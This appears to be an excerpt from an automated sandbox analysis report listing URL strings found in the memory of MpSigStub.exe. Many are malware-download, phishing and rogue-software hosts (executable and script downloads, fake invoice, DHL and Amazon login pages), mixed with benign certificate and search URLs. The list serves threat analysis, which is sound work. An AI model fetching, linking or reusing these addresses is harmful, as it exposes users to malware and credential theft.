Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://redirect.sarahwilkesphotography.co.uk)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://reefer.parts/js/lib/)
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://referfile.com
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://refud.me/scan.php
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://registrywizard.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://relawananaksumsel.or.id/blosting/scan.html)
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://remitenow.one/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://remote-keylogger.net
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://remove.gettango.com/
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://renatopaschoal.com.br/dropbox/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://rentalhabneew.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://rep.eyeez.com/GetArea.aspx
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://report.wallpaper.shqingzao.com
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://report.wallpaper.shqingzao.com~
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://reports.montiera.com/reports/jsRprt.srf?rid=nsis&nsisState=xl
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://requestbin.net/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://resortelasrocas.cl/wp-content/plugins/js_compresor_wp/request.exe
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://retinnoplay.com//ord/excelz/index.php
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://retirepedia.upsproutmedia.com/obskdhi.php
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://return.hk.cn/ma/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://rewards.getjar.com
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://rezultsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://rgho.st/download/8ygs8ldbj/3887c2b13922a712c34f8f2407d142bb5b2ed630/3887c2b13922a712c34f8f240
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://rghost.net/download/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://rhriss.com.br/site/tmp/swagin
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://riyatraveltrip.com/reportmaersknew.php
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://rl.ammyy.com
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://rmportal.bpweb.bp.comx
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://rmuxvayun.pkrgzrpdebksbl.gq:23513/eater.htm?little=15162&extent=kiss&switch=19450
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://ro-member1.com
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://rocesi.com/mncejd.exe
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://romica-puceanu.com
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://rootedmoon.co.uk/css/syle.css.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://royalambassadorschools.com/wp-admin/includes/ftools/johnhood395.php
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://roybeth.com/ext/jquery.php
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://rrppdigital.com.ve/wp-content/ai1wm-backups/chrome.jpg
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://rs-moto.ru/counter/?a=1
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://s-elisa.ru/data
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://s.earching.info/
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://s.earching.info/xA
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://s.symcd.com0_
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/111/pubid1001affid100100
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/116/pubid1004affid100400
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://s.xcodelib.net/updates/ff/apps/119/pubid1008affid100800
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://s01.yapfiles.ru/files/1017459/2.jpg
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://s2.bestmanage.org/?name=%s
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-143692468872/Installer.exe
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://s3.amazonaws.com/adpk/getsavin/getsavin.ini/noproxygetoksettingslocation2http://s3.amazonaws.
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://sabadabe.xyz/_output2b172f0.exe
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://saemaeul.mireene.com/skin/board/basic/bin
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://safesaver.net/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://sahane34sohbet.000webhostapp.com/wp-content/themes/elbee-elgee
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://saintechelon.tk/11.doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://saintechelon.tk/ejl.doc
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://sameshitasiteverwas.com/traf/tds/in.cgi
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://samunphai.de/sup/dhli.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://sandbaggersgolf.club/viewdoc/file.php?document=y2fzyxnqqgzlcnjlci5jb20=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://sangorits.hopto.org/reply/updates.html/f
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://santasalete.sp.gov.br/jss/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://saraylimucevherat.com/docfile/good/)
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://saveasapp.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://sbrenind.com/niggab-x/niggab-x.exe
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://scaladevelopments.scaladevco
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://scaladevelopments.scaladevco.com/17/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://scarecrowlawncare.com/wp-content/themes/sensible-wp/img/gr.mpwq
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://schildersbedrijfdickrorije.nl/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://scorpion-swan.com/bene/dhl/dhl.php)
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://scorpion-swan.com/lamba/loginpdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://screenhost.pw/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://screw-malwrhunterteam.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://scrollayer.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://scud.pipis.net/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://sds.clrsch.com/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://sds.clrsch.com/x
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://sds.qckads.com/sidesearch/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.17173.com/index.jsp?keyword=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.btchina.net/search.php?query=%s
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/search?p=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.crsky.com/search.asp?sType=ResName&keyword=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.games.sina.com.cn/cgi-bin/game_search/game_deal.cgi?keywords=%s
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://search.getwebcake.com/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://search.lycos.com/default.asp?src=clear
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.newhua.com/search.asp?Keyword=%s
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://search.psn.cn/
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	String found in binary or memory: http://search.shopnav.com/
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	String found in binary or memory: http://search.shopnav.com/_
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://search.union.yahoo.com.cn/click/search.htm?m=
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://searchengage.com
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://searchglobalsite.com/in.cgi?
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://secure4709.spaldingscpa.com/con/next.php
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://security-updater.com/binaries/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://seedstar.net
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://seek.3721.com/srchasst.htm
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://seliconos.3utilities.com/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://sellercentral.amazon.de.e487y89hgwe97hr59ew.shanghaicounselor.net/step1.php
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://sense-super.com/cgi/execute_log.cgi?filename=debug&type=failed_registry_read
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://serbetcimimarlik.com/tests/folder/excell.php
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://server00.send6.com/1abf8588/oluwa.exe
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://service.pandtelectric.com/
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://service.softpost.com
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: http://service.srvmd6.com/Mac/getInstallerSettings/?version=
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://serving.myshopcouponmac.com
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://session-dyfm.clientmsg13.review/8446c35a41f9e820533b6cd008b40749?fpcum=&dyfm=ywx2yxjvx3zl
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://setup-mediaplayer.info/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://setup.theoreon.com
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://setup1.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://setup2.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://setup3.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://setup4.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://seuufhehfueughek.ws/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://sf3q2wrq34.ddns.net
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://sfofotky.iexam.info:8080/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://shintorg-k.ru/errors/wpactivt.php
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://shop.doublepoint.net//install/uplist2.php?pid=
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://shop.doublepoint.net/install/p_boot.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://shoppingjardin.com.py/v1/wp-themes/2.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://sighttp.qq.com
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://silberlivigno.com/outstanding-invoices/
Source: MpSigStub.exe, 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp	String found in binary or memory: http://simple%-files.com
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://simsoshop.com/update.php?c=
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://sindarspen.org.br/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://sitem.biz/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://skidochuks.de.nr
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://skidware-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://skorohod.city/invoice-corrections-for-
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://skyfalss.ir/hacnhhy/
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://skype.tom.com/download/install/sobar.exe
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://slideshowlullabies.com/plugins/content/pagenavigation/item.php)
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://sluzby-specjalne.cba.pl/nr26.txt
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://smart-antivirus-2009buy.com
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=x
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://smg-blackhat.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://sndy2kungglobalinvestmentgooglednsaddres.duckdns.org/office/
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://so.163.com/search.php?q=
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://so1.5k5.net/interface?action=install&p=
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://softlog.twoshadow.cn/api/data/sync
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://softthrifty.com/security.jsp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://sokyoss.drelshazly.com:8080/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://solk.seamscreative.info:8080/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://somnathskider.com/wp-content/themes/oceanwp/assets/css/edd/msg
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://sonyxweb.ru
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://soriya.kr
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://sort.freedynamicdns.org/home/key.html/f
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://sp.whitetruem.com/g.php?d=
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://sploogetube.mobi/x.ps1
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://spotdewasa.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://spotvideoporno.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://spy-kill.com/bho_adult.txt
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=GKL&key=%s&v=%s&email=%s
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=fkl&key=%s&v=%s
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/download/141/setup.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/load.php?adv=141
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: MpSigStub.exe, 00000026.00000003.18332044939.00000138BE4E0000.00000004.00000001.sdmp	String found in binary or memory: http://spywprotect.com/purchase
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://srlvonf.info/youtube.xpi
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://srmvx.com.br/uploads/
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://srv166997.hoster-test.ru/decidedly/barrier/barbara/seem/phaytd.dot
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://srv87992.ht-test.ru/west/excelz/index.php
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://staging.stikbot.toys/24.gif
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://stasmaster.hut2.ru/rcv.php
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://stat.02933.com
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://stat.errclean
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://stat.t2t2.com/log/log1.asp?default&user=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://static.hostsecureplugin.com/sdb/fd/host-secure-updater.xml
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://statisonline.casa/register.jpg
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exe
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exehttp://61.135.159.183/installer/sobar.exehttp://sky
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://stats.hosting24.com/count.php
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://status.clrsch.com/loader/
